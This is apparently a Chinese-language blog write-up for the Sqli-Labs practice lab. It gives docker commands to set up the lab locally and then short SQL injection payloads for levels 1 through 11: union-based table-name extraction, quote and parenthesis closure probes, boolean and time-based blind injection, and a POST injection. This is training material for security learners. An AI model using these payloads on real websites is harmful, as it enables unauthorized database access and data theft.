Sqli-Labs 通关文档

安装【docker 版本】

拉取 sqli-labs 镜像

sudo docker pull acgpiano/sqli-labs

启动镜像

sudo docker run -dt --name sqli -p 1234:80 acgpiano/sqli-labs

在浏览器访问 1234 端口

安装完成。

Less-01

单引号闭合问题

payload:

?id=-11' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()-- asd

Less-02

数字型注入

payload:

?id=-11 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

Less-03

单引号 + 小括号

payload

?id=1') -- asd

Less-04

双引号 + 小括号

payload

?id=1") -- asd

Less-05

盲注单引号闭合

payload

?id=2' and if(0,1,0)-- asd

Less-06

盲注 + 双引号闭合

payload

?id=2" and if(0,1,0)-- asd

Less-07

盲注 + 单引号+ 双层小括号闭合

payload

?id=1')) and if(1,1,0) -- asd

Less-08

盲注 + 单引号闭合

payload

?id=1' and if(1,1,0) -- asd

Less-09

时间盲注，单引号闭合

payload

2' and if(1,sleep(5),0) -- asd

Less-10

时间盲注，双引号闭合

payload

1" and if(1,sleep(5),0) -- asd

Less-11

post 注入单引号闭合

payload

a' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

WriteUp

#网络安全 #SQL注入

Sqli-Labs 通关文档

https://blog.lixey.top/Sqli-Labs-通关文档/

Author

Lixiney

Posted on

June 28, 2025

Licensed under

Python开发-Flask框架 Previous

Mysql增删改查基础 Next

Sqli-Labs 通关文档

安装 【docker 版本】

Less-01

Less-02

Less-03

Less-04

Less-05

Less-06

Less-07

Less-08

Less-09

Less-10

Less-11

安装【docker 版本】